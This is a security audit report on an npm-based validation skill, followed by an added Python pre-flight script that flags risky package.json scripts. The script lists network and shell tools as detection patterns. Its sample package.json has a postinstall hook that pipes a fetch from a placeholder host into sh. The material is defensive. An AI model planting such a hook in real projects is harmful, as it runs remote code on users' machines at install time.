Validator Agent
Pass
Audited by ClawScan on May 1, 2026.
Overview
This skill is a coherent pre-deployment validator, but it needs to run local project commands, so use it only on repositories and dependencies you trust.
This appears safe for its stated purpose as an instruction-only validation skill. Before installing or invoking it, be aware that it runs your project's local build, lint, test, audit, and npx tooling; use it only on repositories you trust, and review the package scripts and dependencies of unfamiliar projects before the first run.
Findings (3)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Running the validator may execute code from the repository and its dependencies, even though the skill itself does not include code.
The skill instructs the agent to run local npm commands in the selected project. This is expected for validation, but npm scripts execute whatever the project's package.json defines for them (including any pre/post hooks npm runs around a script), so the project controls what runs.
cd <project> && npm run lint 2>&1 | tail -20 ... cd <project> && npm test 2>&1
Use it on trusted projects, review package scripts before running, and avoid pointing it at untrusted repositories.
A validation run can execute package tooling in the local environment, which may have side effects if the project or package source is untrusted.
The documented validation flow uses npx-based tooling. That is normal for TypeScript validation, but npx runs the locally installed binary when one exists in node_modules/.bin and, depending on the npm version and configuration, may otherwise fetch the package from the registry and execute it.
cd <project> && npx tsc --noEmit 2>&1 ... cd <project> && npx type-coverage 2>&1 || echo "type-coverage not installed — skip"
Prefer projects with pinned dependencies and installed, reviewed tooling; run in a controlled workspace when validating unfamiliar code.
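The two findings above come down to one pre-flight question: what will `npm run`, `npm test` and `npx` actually execute in this project? The following script is an added example, not part of the ClawScan report or of the Validator Agent skill. It parses a package.json, flags lifecycle hooks that npm runs automatically, flags script bodies that fetch from the network, pipe to a shell or evaluate inline code, reports which of the documented npx tools (`tsc`, `type-coverage`) are missing from node_modules/.bin and would therefore be fetched, and warns when no lockfile pins dependency versions. The hook names, the suspicious-pattern list and the sample package.json are the author's own choices for illustration, not anything the skill or ClawScan defines.

```python
"""Pre-flight review of an npm project before pointing a validator at it.

Added example, not code from the ClawScan report or the Validator Agent skill.
It surfaces the places where `npm run ...`, `npm test` and `npx ...` would run
project-controlled code so a reviewer can read them before the first run.
"""
import json
import os
import re

# Script names npm runs automatically around install/test/etc. (illustrative
# subset; npm also runs pre<name>/post<name> for any script named <name>).
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall", "prepare", "prepublish",
    "pretest", "posttest", "prelint", "postlint", "prepack", "postpack",
}

# Constructs in a script body a reviewer should read before running it.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|nc|ncat)\b"      # network fetch / connect
    r"|\bnode\s+-e\b"               # inline JavaScript
    r"|\b(sh|bash)\s+-c\b"          # inline shell
    r"|\beval\b"
    r"|\|\s*(sh|bash)\b"            # pipe-to-shell
    r"|\bbase64\s+(-d|--decode)\b"  # decoded payloads
)

# Binaries the documented validation flow invokes through npx.
NPX_TOOLS = ("tsc", "type-coverage")

LOCKFILES = {"package-lock.json", "npm-shrinkwrap.json", "yarn.lock", "pnpm-lock.yaml"}


def review_package(pkg: dict, bin_entries: set, project_files: set) -> list:
    """Return (severity, message) findings for one parsed package.json.

    bin_entries: names present in node_modules/.bin
    project_files: filenames present in the project root
    """
    findings = []
    scripts = pkg.get("scripts") or {}

    for name, body in scripts.items():
        if name in LIFECYCLE_HOOKS:
            findings.append(("warn", f"lifecycle hook '{name}' runs automatically: {body}"))
        m = SUSPICIOUS.search(body)
        if m:
            findings.append(("warn", f"script '{name}' contains '{m.group(0)}': {body}"))

    for tool in NPX_TOOLS:
        if tool not in bin_entries:
            findings.append(("info", f"npx would have to fetch '{tool}' (not in node_modules/.bin)"))

    if not project_files & LOCKFILES:
        findings.append(("warn", "no lockfile found: dependency versions are not pinned"))

    return findings


def review_project(path: str) -> list:
    """Read package.json and node_modules/.bin from disk and review them."""
    with open(os.path.join(path, "package.json"), encoding="utf-8") as f:
        pkg = json.load(f)
    bin_dir = os.path.join(path, "node_modules", ".bin")
    bins = set(os.listdir(bin_dir)) if os.path.isdir(bin_dir) else set()
    return review_package(pkg, bins, set(os.listdir(path)))


# Constructed sample package.json for the demo; not taken from any real project.
SAMPLE_PACKAGE = {
    "name": "demo-app",
    "version": "0.1.0",
    "scripts": {
        "lint": "eslint src",
        "test": "jest",
        "postinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid | sh')\"",
    },
}

if __name__ == "__main__":
    # Simulate a project with eslint, jest and tsc installed but no type-coverage.
    for sev, msg in review_package(SAMPLE_PACKAGE, {"eslint", "jest", "tsc"}, {"package-lock.json"}):
        print(f"[{sev}] {msg}")
```

Run `review_project("<project>")` against the checkout before invoking the skill; anything reported as `warn` is worth reading in full, and an `info` line means the validator's npx step would leave the set of locally reviewed tooling. Installing the tools first (so they appear in node_modules/.bin) removes the fetch path entirely.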
Users may be unsure which version of the skill metadata they are reviewing or installing.
The registry metadata reports version 1.1.0, while the included skill.json reports version 1.0.0. This is a minor provenance/coherence mismatch rather than evidence of harmful behavior.
"version": "1.0.0"
Verify the published package/version details if version provenance matters for your workflow.
